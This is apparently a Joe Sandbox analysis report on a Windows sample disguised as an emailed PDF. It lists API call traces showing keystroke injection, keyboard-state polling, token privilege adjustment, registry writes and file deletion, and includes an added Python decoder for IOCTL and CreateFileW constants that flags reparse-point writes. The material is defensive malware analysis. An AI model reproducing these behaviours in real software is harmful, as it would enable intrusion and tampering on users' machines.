                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_memset
                                                                                                          • String ID: 3cv$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_v
                                                                                                          • API String ID: 1357608183-1043445878
                                                                                                          • Opcode ID: 783ee9a90668f02f514228bfda47b1b67fd6a0e33675dfd1002f47b9db32f063
                                                                                                          • Instruction ID: 84a1a099274d3a2526d7da18cb63f2eb7dcae0d15205cee805dd492aa273f158
                                                                                                          • Opcode Fuzzy Hash: 783ee9a90668f02f514228bfda47b1b67fd6a0e33675dfd1002f47b9db32f063
                                                                                                          • Instruction Fuzzy Hash: CD93A571E04219DFDB28CF58C8817ADB7B1FF89314F24826AE955AB381E7789D81CB50
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32(00000000,?), ref: 007548DF
                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0078D665
                                                                                                          • IsIconic.USER32(?), ref: 0078D66E
                                                                                                          • ShowWindow.USER32(?,00000009), ref: 0078D67B
                                                                                                          • SetForegroundWindow.USER32(?), ref: 0078D685
                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0078D69B
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0078D6A2
                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0078D6AE
                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0078D6BF
                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0078D6C7
                                                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 0078D6CF
                                                                                                          • SetForegroundWindow.USER32(?), ref: 0078D6D2
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078D6E7
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078D6F2
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078D6FC
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078D701
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078D70A
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078D70F
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078D719
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078D71E
                                                                                                          • SetForegroundWindow.USER32(?), ref: 0078D721
                                                                                                          • AttachThreadInput.USER32(?,?,00000000), ref: 0078D748
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                          • String ID: Shell_TrayWnd
                                                                                                          • API String ID: 4125248594-2988720461
                                                                                                          APIs
                                                                                                            • Part of subcall function 007A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A882B
                                                                                                            • Part of subcall function 007A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8858
                                                                                                            • Part of subcall function 007A87E1: GetLastError.KERNEL32 ref: 007A8865
                                                                                                          • _memset.LIBCMT ref: 007A8353
                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007A83A5
                                                                                                          • CloseHandle.KERNEL32(?), ref: 007A83B6
                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007A83CD
                                                                                                          • GetProcessWindowStation.USER32 ref: 007A83E6
                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 007A83F0
                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007A840A
                                                                                                            • Part of subcall function 007A81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007A8309), ref: 007A81E0
                                                                                                            • Part of subcall function 007A81CB: CloseHandle.KERNEL32(?,?,007A8309), ref: 007A81F2
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                          • String ID: $default$winsta0
                                                                                                          • API String ID: 2063423040-1027155976
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 007BC78D
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BC7E1
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007BC806
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007BC81D
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 007BC844
                                                                                                          • __swprintf.LIBCMT ref: 007BC890
                                                                                                          • __swprintf.LIBCMT ref: 007BC8D3
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          • __swprintf.LIBCMT ref: 007BC927
                                                                                                            • Part of subcall function 00773698: __woutput_l.LIBCMT ref: 007736F1
                                                                                                          • __swprintf.LIBCMT ref: 007BC975
                                                                                                            • Part of subcall function 00773698: __flsbuf.LIBCMT ref: 00773713
                                                                                                            • Part of subcall function 00773698: __flsbuf.LIBCMT ref: 0077372B
                                                                                                          • __swprintf.LIBCMT ref: 007BC9C4
                                                                                                          • __swprintf.LIBCMT ref: 007BCA13
                                                                                                          • __swprintf.LIBCMT ref: 007BCA62
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                          • API String ID: 3953360268-2428617273
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007BEFB6
                                                                                                          • _wcscmp.LIBCMT ref: 007BEFCB
                                                                                                          • _wcscmp.LIBCMT ref: 007BEFE2
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 007BEFF4
                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 007BF00E
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 007BF026
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BF031
                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 007BF04D
                                                                                                          • _wcscmp.LIBCMT ref: 007BF074
                                                                                                          • _wcscmp.LIBCMT ref: 007BF08B
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007BF09D
                                                                                                          • SetCurrentDirectoryW.KERNEL32(00808920), ref: 007BF0BB
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 007BF0C5
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BF0D2
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BF0E4
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 1803514871-438819550
                                                                                                          APIs
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0953
                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,007DF910,00000000,?,00000000,?,?), ref: 007D09C1
                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007D0A09
                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007D0A92
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 007D0DB2
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007D0DBF
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectCreateRegistryValue
                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                          • API String ID: 536824911-966354055
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007BF113
                                                                                                          • _wcscmp.LIBCMT ref: 007BF128
                                                                                                          • _wcscmp.LIBCMT ref: 007BF13F
                                                                                                            • Part of subcall function 007B4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007B43A0
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 007BF16E
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BF179
                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 007BF195
                                                                                                          • _wcscmp.LIBCMT ref: 007BF1BC
                                                                                                          • _wcscmp.LIBCMT ref: 007BF1D3
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007BF1E5
                                                                                                          • SetCurrentDirectoryW.KERNEL32(00808920), ref: 007BF203
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 007BF20D
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BF21A
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BF22C
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 1824444939-438819550
                                                                                                          APIs
                                                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007BA20F
                                                                                                          • __swprintf.LIBCMT ref: 007BA231
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 007BA26E
                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007BA293
                                                                                                          • _memset.LIBCMT ref: 007BA2B2
                                                                                                          • _wcsncpy.LIBCMT ref: 007BA2EE
                                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007BA323
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007BA32E
                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 007BA337
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007BA341
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                          • String ID: :$\$\??\%s
                                                                                                          • API String ID: 2733774712-3457252023
                                                                                                          • Opcode ID: 36dafd85658cb18db17eaaf34ae36e92cd1252c748fbe5cb4435904f125fce47
                                                                                                          • Instruction ID: 95db6944965e8e75eb0396c9a9221b4df609b8a825ae4cf36a2f1175ef93592b
                                                                                                          • Opcode Fuzzy Hash: 36dafd85658cb18db17eaaf34ae36e92cd1252c748fbe5cb4435904f125fce47
                                                                                                          • Instruction Fuzzy Hash: 78319EB1900109BBDB21AFA4DC49FEB37BCEF89740F1081B6F509D2160EB7896458B29
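The call sequence in the record above (GetFullPathNameW, CreateDirectoryW, CreateFileW with desired access 0x40000000 and flags 0x02200000, DeviceIoControl with control code 0x000900A4, then RemoveDirectoryW on the cleanup path, with the format string `\??\%s`) is the shape of a routine that opens a freshly created directory and writes a reparse point to it; `\??\` is the NT object-manager prefix that reparse-point substitute names carry. The constants are only meaningful once decoded, so the following Python is an added helper, not part of the Joe Sandbox report or of the sample, that splits a DeviceIoControl control code into its CTL_CODE fields and names the CreateFileW arguments listed in the report. All constant values come from the Windows SDK headers; the three FSCTL names and the device-type names are the only table entries, and the `looks_like_reparse_point_write` heuristic is this example's own, not a rule from the report.

```python
# Added example, not from the Joe Sandbox report. Decodes the numeric
# arguments the report lists for CreateFileW and DeviceIoControl.
# Constant values are from the Windows SDK (winioctl.h, winnt.h, fileapi.h).

# CTL_CODE(DeviceType, Function, Method, Access) =
#     (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
DEVICE_TYPES = {
    0x07: "FILE_DEVICE_DISK",
    0x09: "FILE_DEVICE_FILE_SYSTEM",
    0x12: "FILE_DEVICE_NETWORK",
    0x22: "FILE_DEVICE_UNKNOWN",
}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
ACCESS = {
    0: "FILE_ANY_ACCESS",
    1: "FILE_READ_ACCESS",
    2: "FILE_WRITE_ACCESS",
    3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS",
}
# Reparse-point FSCTLs: FILE_DEVICE_FILE_SYSTEM, functions 41, 42, 43.
KNOWN_FSCTL = {
    0x000900A4: "FSCTL_SET_REPARSE_POINT",
    0x000900A8: "FSCTL_GET_REPARSE_POINT",
    0x000900AC: "FSCTL_DELETE_REPARSE_POINT",
}

# CreateFileW argument tables.
DESIRED_ACCESS = {
    0x80000000: "GENERIC_READ",
    0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE",
    0x10000000: "GENERIC_ALL",
}
CREATION_DISPOSITION = {
    1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
    4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING",
}
FILE_FLAGS = {
    0x80000000: "FILE_FLAG_WRITE_THROUGH",
    0x40000000: "FILE_FLAG_OVERLAPPED",
    0x20000000: "FILE_FLAG_NO_BUFFERING",
    0x10000000: "FILE_FLAG_RANDOM_ACCESS",
    0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN",
    0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
    0x01000000: "FILE_FLAG_POSIX_SEMANTICS",
    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
}


def decode_ioctl(code):
    """Split a DeviceIoControl control code into its CTL_CODE fields."""
    device = (code >> 16) & 0xFFFF
    access = (code >> 14) & 0x3
    function = (code >> 2) & 0xFFF
    method = code & 0x3
    return {
        "name": KNOWN_FSCTL.get(code, "unknown"),
        "device_type": DEVICE_TYPES.get(device, hex(device)),
        "function": function,
        "method": METHODS[method],
        "access": ACCESS[access],
    }


def decode_bitmask(value, names):
    """Name every set bit found in `names` (ascending bit order); append
    any leftover bits as a hex literal so nothing is silently dropped."""
    out = [name for bit, name in sorted(names.items()) if value & bit]
    known = 0
    for bit in names:
        known |= bit
    leftover = value & ~known
    if leftover:
        out.append(hex(leftover))
    return out


def decode_createfile(desired_access, creation_disposition, flags_and_attrs):
    """Render the three numeric CreateFileW arguments the report shows."""
    return {
        "desired_access": decode_bitmask(desired_access, DESIRED_ACCESS),
        "creation_disposition": CREATION_DISPOSITION.get(creation_disposition, "unknown"),
        "flags": decode_bitmask(flags_and_attrs, FILE_FLAGS),
    }


def looks_like_reparse_point_write(desired_access, creation_disposition, flags, ioctl):
    """Heuristic (this example's own, not the report's): a writable handle
    opened on an existing directory with reparse-point semantics, followed by
    FSCTL_SET_REPARSE_POINT, is how a junction or symlink is written."""
    info = decode_createfile(desired_access, creation_disposition, flags)
    return (
        "GENERIC_WRITE" in info["desired_access"]
        and info["creation_disposition"] == "OPEN_EXISTING"
        and "FILE_FLAG_OPEN_REPARSE_POINT" in info["flags"]
        and "FILE_FLAG_BACKUP_SEMANTICS" in info["flags"]
        and decode_ioctl(ioctl)["name"] == "FSCTL_SET_REPARSE_POINT"
    )


if __name__ == "__main__":
    # Values copied from the report's CreateFileW / DeviceIoControl lines.
    print(decode_createfile(0x40000000, 3, 0x02200000))
    print(decode_ioctl(0x000900A4))
    print(looks_like_reparse_point_write(0x40000000, 3, 0x02200000, 0x000900A4))
```

Running it against the values in the record gives GENERIC_WRITE, OPEN_EXISTING, FILE_FLAG_OPEN_REPARSE_POINT plus FILE_FLAG_BACKUP_SEMANTICS, and FSCTL_SET_REPARSE_POINT (device type FILE_DEVICE_FILE_SYSTEM, function 41, METHOD_BUFFERED). The same decoder can be pointed at any other DeviceIoControl code in a sandbox listing; an unknown code still yields its device type, function number and buffering method, which is usually enough to find it in winioctl.h.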
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 036210c621026210062101621086210962105621056210e6210c621086210b62104621056210f6210c621006210f6210b621076210462108621006210662103621$3cv$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_v
                                                                                                          • API String ID: 0-1346999756
                                                                                                          • Opcode ID: f92eda524497126ff5b2979bbdede9d660a0bb66d808dabdb4be46f282b2c537
                                                                                                          • Instruction ID: e7326cf34a5765e112073fa3ffcafab223da05974f253ab5e5184098948f398c
                                                                                                          • Opcode Fuzzy Hash: f92eda524497126ff5b2979bbdede9d660a0bb66d808dabdb4be46f282b2c537
                                                                                                          • Instruction Fuzzy Hash: 5F726175E00219DBEF14CF59C8407AEB7B5FF89310F54826AE94AEB291E7389D41CB90
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 007B0097
                                                                                                          • SetKeyboardState.USER32(?), ref: 007B0102
                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 007B0122
                                                                                                          • GetKeyState.USER32(000000A0), ref: 007B0139
                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 007B0168
                                                                                                          • GetKeyState.USER32(000000A1), ref: 007B0179
                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 007B01A5
                                                                                                          • GetKeyState.USER32(00000011), ref: 007B01B3
                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 007B01DC
                                                                                                          • GetKeyState.USER32(00000012), ref: 007B01EA
                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 007B0213
                                                                                                          • GetKeyState.USER32(0000005B), ref: 007B0221
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          • Opcode ID: 481b3e5c3c5be9d55598ea0ce36828777a88ad75917729f8d64ce8f0b343a12b
                                                                                                          • Instruction ID: d13c83a4fe4f8c74eb75a5b81a70656f3bdda1aadd0bab617e715544dd17bd92
                                                                                                          • Opcode Fuzzy Hash: 481b3e5c3c5be9d55598ea0ce36828777a88ad75917729f8d64ce8f0b343a12b
                                                                                                          • Instruction Fuzzy Hash: C351C92090478C69FB35EBA488587EFBFB49F01380F48459AD5C2575C2DAAC9B8CC7E1
                                                                                                          APIs
                                                                                                            • Part of subcall function 007D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007CFDAD,?,?), ref: 007D0E31
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D04AC
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007D054B
                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007D05E3
                                                                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007D0822
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007D082F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1240663315-0
                                                                                                          • Opcode ID: 306a709463ffb292cc1a661cb16467294613724d938119a96320f2b909a10369
                                                                                                          • Instruction ID: 8e8ae84af5cb55bcd9a85e1cbfe72d093dfe3b808bed182050b19b4ba106ffad
                                                                                                          • Opcode Fuzzy Hash: 306a709463ffb292cc1a661cb16467294613724d938119a96320f2b909a10369
                                                                                                          • Instruction Fuzzy Hash: 77E13B71604204EFCB14DF24C895E6ABBF5EF89314F04856EF94ADB261DA38E905CB92
                                                                                                          APIs
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          • CoInitialize.OLE32 ref: 007C8403
                                                                                                          • CoUninitialize.OLE32 ref: 007C840E
                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,007E2BEC,?), ref: 007C846E
                                                                                                          • IIDFromString.OLE32(?,?), ref: 007C84E1
                                                                                                          • VariantInit.OLEAUT32(?), ref: 007C857B
                                                                                                          • VariantClear.OLEAUT32(?), ref: 007C85DC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                          • API String ID: 834269672-1287834457
                                                                                                          • Opcode ID: e8336fd29cc17e0f05b2c75bba61ed771ada34553a3304abbe54039f40d98155
                                                                                                          • Instruction ID: 2b0a58ff7ab2ecd74843f1948bbd92937a826c8320b134c48bc0345318d029a2
                                                                                                          • Opcode Fuzzy Hash: e8336fd29cc17e0f05b2c75bba61ed771ada34553a3304abbe54039f40d98155
                                                                                                          • Instruction Fuzzy Hash: 89616970608212DFC754DF24D848F5AB7E8AF49754F04441DF9869B291CBB8EE48CB93
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1737998785-0
                                                                                                          • Opcode ID: c6f5e1b8c7ba3da390a8d39caa4a390d30f136d458267cde2b16c813efc1539a
                                                                                                          • Instruction ID: 1e588755c64c4d231f7cc55065ef5764499ab4b40681023c41a5d119d27daf29
                                                                                                          • Opcode Fuzzy Hash: c6f5e1b8c7ba3da390a8d39caa4a390d30f136d458267cde2b16c813efc1539a
                                                                                                          • Instruction Fuzzy Hash: 03217A35201214DFDB10AF24EC19B6E7BB8FF45721F18C02AF9469B2A1DB78E9008B58
                                                                                                          APIs
                                                                                                            • Part of subcall function 00754750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00754743,?,?,007537AE,?), ref: 00754770
                                                                                                            • Part of subcall function 007B4A31: GetFileAttributesW.KERNEL32(?,007B370B), ref: 007B4A32
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 007B38A3
                                                                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007B394B
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 007B395E
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007B397B
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B399D
                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007B39B9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                          • String ID: \*.*
